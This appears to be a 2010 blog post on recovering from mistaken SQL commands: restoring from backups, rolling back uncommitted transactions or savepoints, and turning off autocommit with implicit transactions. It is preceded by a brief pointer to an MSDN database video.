The Microsoft Developer Network is a pretty valuable resource for anyone looking for answers regarding Microsoft programming concepts, tips, tutorials, even platform-specific error resolution and workarounds.  For SQL newbies looking to hone their skills, you may find this MSDN video introduction to Visual Basic database creation helpful.  Enjoy…

 

Undo changes to SQL database? Well, sort of….

Monday, May 24th, 2010

Not too far back, a client who spends all day (and sometimes all night) creating and running SQL queries and commands in a secure database posed an interesting question:  When working late at night, he’s concerned that he will accidentally botch a SQL command and cause irreparable harm to the database – is there such a thing as an undo button in SQL?

 

Sorry, the short answer is no, there is no CTRL + Z keystroke equivalent that will magically undo a potentially disastrous command once committed to the database, and most query tools run in autocommit mode.  If you find this post during a panic-induced hunt for options to repair error(s) you realize you made a few hours ago, your options are few and far between:

 

  • You can restore all or part of the database from a backup (you do have a backup, don’t you?), which is the start of a whole new problem that possibly now involves your boss
  • You can rollback transactions, assuming they haven’t been committed
  • You can rollback to a given point in time using a savepoint name

 

Randomly undoing transactions in a SQL database can leave it in an inconsistent state.  It is therefore not only advisable but necessary to examine each operation relationally prior to altering database structure.  Transaction logs contain changes only, and it can be difficult to piece together the relationship of individual changes to the big picture.  Third-part software such as this SQL transaction log tool can assist in this regard by providing an operation-by-operation breakdown of each change to give you greater perspective.  This SQL Server transaction log restore tutorial may assist you in the event you’re forced to restore prior versions of database or file groups, as well as points in time.

 

Another tip when working on something extremely sensitive (or late at night when normal people are sleeping) is to disable autocommit using set implicit_transactions {ON/OFF}, which will give you the option to rollback or commit manually.  The setting is also available in Microsoft SQL Query Analyzer under TOOLS>OPTIONS>CONNECTION PROPERTIES.

 

Of course, you could go to bed at a decent hour instead of executing SQL commands after midnight like some kind of crazy nocturnal code monkey.  Or just be more careful, whatever works for you….